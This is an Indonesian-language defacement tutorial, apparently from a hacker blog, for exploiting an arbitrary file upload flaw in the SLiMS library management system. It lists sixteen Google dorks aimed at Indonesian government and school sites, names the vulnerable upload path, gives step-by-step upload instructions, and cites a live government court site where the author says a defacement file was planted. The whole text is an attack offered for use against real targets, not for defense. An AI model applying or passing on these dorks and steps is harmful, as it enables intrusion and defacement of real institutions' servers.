Deface Poc Exploit slims Cms Arbitary File Upload - W4FXploit

 Assalamualaikum bro

kali ini gw mau kasih tau cara

Exploit slims cms arbitary file Upload

*lihat title ajg

gas ae lah...

 Bahan²:

★ Dork : 

#Google Dork 1 : intext:''The Winner in the Category of OSS Indonesia ICT Award 2009'' #Google Dork 2 : inurl:''index.php?p=show_detail&id='' site:id #Google Dork 3 : inurl:''/slims5-meranti/'' site:id #Google Dork 4 : intext:This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009'' #Google Dork 5 : Powered by SLiMS site:id #Google Dork 6 : Powered by SLiMS | Design by Indra Sutriadi Pipii #Google Dork 7 : Beranda Depan · Info Perpustakaan · Area Anggota · Pustakawan · Bantuan Pencarian · MASUK Pustakawan. #Google Dork 8 : Akses Katalog Publik Daring - Gunakan fasilitas pencarian untuk mempercepat penemuan data katalog. #Google Dork 9 : SLiMS (Senayan Library Management System) is an open source Library Management System. It is build on Open source technology like PHP and MySQL. #Google Dork 10 : PERPUSTAKAAN - Web Online Public Access Catalog - Use the search options to find documents quickly This software and this template are released Under GNU GPL License Version 3 #Google Dork 11 : inurl:''/index.php?select_lang='' site:sch.id #Google Dork 12 : Web Online Public Access Catalog - Gunakan fasilitas pencarian untuk mempercepat anda menemukan data katalog #Google Dork 13 : Welcome To Senayan Library's Online Public Access Catalog (OPAC). Use OPAC to search collection in our library. #Google Dork 14 : O.P.A.C. (On-line Public Access Catalogue) #Google Dork 15 : inurl:''/perpustakaan/repository/'' site:id #Google Dork 16 : Senayan | Open Source Library Management System :: OPAC

 ★Exploit: /admin/modules/bibliography/pop_attach.php

★ Sc depes : txt jpg png 

★ device 

[ STEP ]

1. Dorking dulu menggunakan SALAH SATU dork di atas dan pilih target nya 

live target ? http://pn-tapaktuan.go.id/pustaka/admin/modules/bibliography/pop_attach.php ( sesudah gw kasih Exploit )

2. Masukan Exploit dibelakang url 

  *contoh : https://target.lu/Exploitnya

3.maka tampilan nya bakal kek gini

4. kalian klik pilih file dan upload sc depes kalian

5. lalu klik upload...

Cara manggilnya ?

https://Target.lu/repository/File.Lu

 *contoh punya gw : http://pn-tapaktuan.go.id/pustaka/repository/Xp.txt

karena nama file gw Xp dan ext nya txt

[ Selesai ]

#happy learn